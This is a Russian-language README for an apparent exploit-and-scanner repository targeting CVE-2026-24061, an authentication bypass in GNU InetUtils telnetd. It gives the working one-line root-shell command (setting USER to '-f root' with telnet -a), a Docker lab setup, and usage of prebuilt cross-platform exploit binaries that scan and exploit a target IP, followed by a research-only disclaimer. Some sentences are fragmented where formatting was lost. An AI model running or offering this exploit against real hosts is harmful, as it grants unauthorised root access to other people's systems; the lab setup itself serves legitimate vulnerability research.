
Эксплойт и сканер для CVE-2026-24061 — обход аутентификации в telnetd, предоставляющий root-оболочку через специально сформированную переменную окружения USER. Включает настройку окружения Docker и кроссплатформенные бинарные файлы эксплойта.
CVE-2026-24061 — это уязвимость обхода аутентификации в telnetd, которая позволяет злоумышленникам обойти проверку личности с помощью определённых комбинаций переменных окружения и напрямую получить shell с правами root.
В логике аутентификации telnetd существует недостаток. При использовании опции -a (автоматический вход) в сочетании с определённой переменной окружения USER (например, -f root) можно обойти стандартный процесс аутентификации и войти напрямую под пользователем root.
GNU InetUtils — это набор базовых сетевых инструментов в рамках проекта GNU. Он содержит множество традиционных сетевых клиентов и демонов, таких как ftp, telnet, rsh, rlogin, tftp и другие, предоставляя комплексную библиотеку сетевых компонентов в стиле GNU. — это серверная программа в этом наборе, отвечающая за обработку входящих Telnet-запросов на подключение, основной задачей которой является предоставление удалённым пользователям интерактивного терминального интерфейса (обычно Shell).
telnetdinetd или xinetd на порту 23. При поступлении запроса запускается telnetd.login для проверки имени пользователя и пароля.Сначала загрузите этот репозиторий локально. Структура каталогов выглядит следующим образом:

В этом каталоге выполните следующую команду, чтобы запустить уязвимое окружение для CVE-2026-24061:
docker compose up -d --build

После запуска служба telnet будет работать на 0.0.0.0:2323

-a в telnetd используется для включения функции автоматического входа-a включена, telnetd считывает переменную окружения USER как имя пользователя для входаUSER установлена в -f root, telnetd ошибочно интерпретирует -f как флаг опции, а root — как целевого пользователя# Установите переменную окружения USER и подключитесь с помощью telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323
В случае успеха вы получите интерактивный shell с правами root:

cd exp

Вы можете увидеть три файла: exp, exp_darwin и exp.exe — это исполняемые файлы для Linux, Mac и Windows соответственно. Выберите тот, который вам нужен. Исходный код инструмента также предоставлен. Если вам нужны другие версии, вы можете скомпилировать их самостоятельно. Здесь я использую exp для Linux, у которого есть подробная справочная информация.

Обнаружение наличия уязвимости (по умолчанию сканируется порт 23):
./exp -mode scan -target your-ip -port your-port

Эксплуатация уязвимости и получение shell:
./exp -mode exploit -target your-ip -port your-port

Этот проект предназначен только для исследований в области безопасности и образовательных целей. Не используйте его на несанкционированных системах. Пользователи несут всю юридическую ответственность за любые последствия, возникшие в результате использования этого инструмента.